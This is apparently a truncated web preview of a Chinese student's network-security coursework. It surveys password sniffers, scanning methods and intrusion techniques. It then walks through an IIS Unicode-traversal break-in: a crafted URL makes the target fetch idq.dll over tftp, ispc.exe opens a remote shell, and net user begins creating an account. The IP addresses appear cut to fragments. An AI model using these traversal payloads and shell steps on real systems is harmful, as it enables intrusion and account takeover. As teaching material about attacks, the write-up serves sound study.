《网络安全技术》课程考查大作业 (6).docx
文本预览下载声明
大连外国语大学软件学院
成绩评定:《网络安全技术》
成绩评定:
专业: 信管英日 年级: 13 班级: 21 姓名: 于朝阳 学号: 2133
黑客常用网络侦听、网络扫描、网络入侵方法简介
网络侦听:是侦听计算机之间的通信内容,对协议进行分析。
主要常用方法有:
(1)监听器Sniffer Pro:在同一网段的计算机中,通过sniffer pro 软件在主机与其他同一网段计算机在发送数据或Ping通的时候进行监听。在数据发送结束后,通过Sniffer Pro截获的数据包内容进行分析,可以分析IP地址及发送的数据内容。
(2)pswmonitor监听器: pswmonitor监听器用于监听WEB的邮箱密码、POP3收信密码和FTP登录密码等。它只需要在一台计算机上打开,将所需要监听的计算机的IP地址输入到程序对应的输入框内,就可以监听到其局域网内任意一台计算机的用户名和密码,并且可以将所得到的用户名密码显示保存,发送到指定的邮箱内。
(3).Win Sniffer密码监听工具
网络扫描:是黑客攻击攻击五部曲中的第二部,网络扫描分为两种,一种是主动式策略一种是被动式策略。
被动式是在基于主机的基础之上,对系统中不合理的设置,简易的口令以及其他违背全规则的对象进行检查。而主动式是利用网络,它通过执行一些应用程序文件模拟对系统进行攻击并且记录系统的反应,之后通过分析这些记录发现其中的漏洞。
主要常用方法有:
系统用户扫描
开放端口扫描
共享目录扫描
利用TCP协议进行端口扫描
漏洞扫描
网络入侵主要方法:
后门:黑客为了防止原来进入的通道被察觉,开发一些隐蔽的进入通道(我们俗称的后门),使重新进入变得容易,这些通道是难以被发现的。
扫描器:通过广泛地扫描因特网来确定计算机、服务器和连接的类型。恶意的人常常利用这种方法来找到计算机和软件的薄弱环节并加以利用。
密码破解:入侵者破解系统的登录或管理密码及其他一些关键口令。
第一种入侵方法
2.1 方法原理
利用Unicode漏洞入侵对方系统
2.2 入侵过程
(2).入侵具体过程
首先使用tftpd32.exe建立服务器,将idq.dll和tftpd32.exe两个文件放在同一个目录下,然后运行tftpd32.exe这个程序,如下图2-1所示
图2-1
我们在已经本地主机创建了TFTP服务器。
然后我们要将本地的浏览器打开,输入这样一串字符 10/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+i+09+get+idq.dll。如下图2-2所示
图2-2
这么做完之后,idq.dll已经发送到目标主机当中去了。当然,为了确保,我们查看一下目标主机的scripts目录确保是否真的上去了。在本地主机浏览器中输入 10/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir如下图2-3所示
图2-3
然后我们就会发现,在对应今天时间的最后存在了一个idq.dll文件,这代表我们的确已经上传成功。之后我们将ispc.exe这个文件复制本地计算机的C盘根目录下。如下图2-4所示。
图2-4
这样ispc.exe这个文件我们也已经拷到本地计算机C盘根目录下了。接下来我们要打开DOS命令,在DOS命令行下输入两次cd..,使路径回到C盘根目录下,如下图2-5所示。
图2-5
这样我们的路径就回到了C盘的根目录下,紧接着,我们要在DOS命令行下输入如下命令ispc.exe 10/scripts/idq.dll,来登录对方的DOS命令,如下图2-6和如2-7所示。
图2-6
图2-7
我们可以看到,我们已经连接到了对方的DOS命令,下面来验证一下是否真的进入了。
在DOS命令行下输入ipconfig,然后就进入了如下界面,如图2-8所示。
图2-8
从图中可以看到,连入的IP地址为10,这意味着我们已经登入了对方的DOS命令。接下来我们就可以在对方DOS命令下进行管理员的任何操作了。例如我们可以在对方的计算机上利用net user创建一个用户:用户名为xiaoyuzuishuai,密
显示全部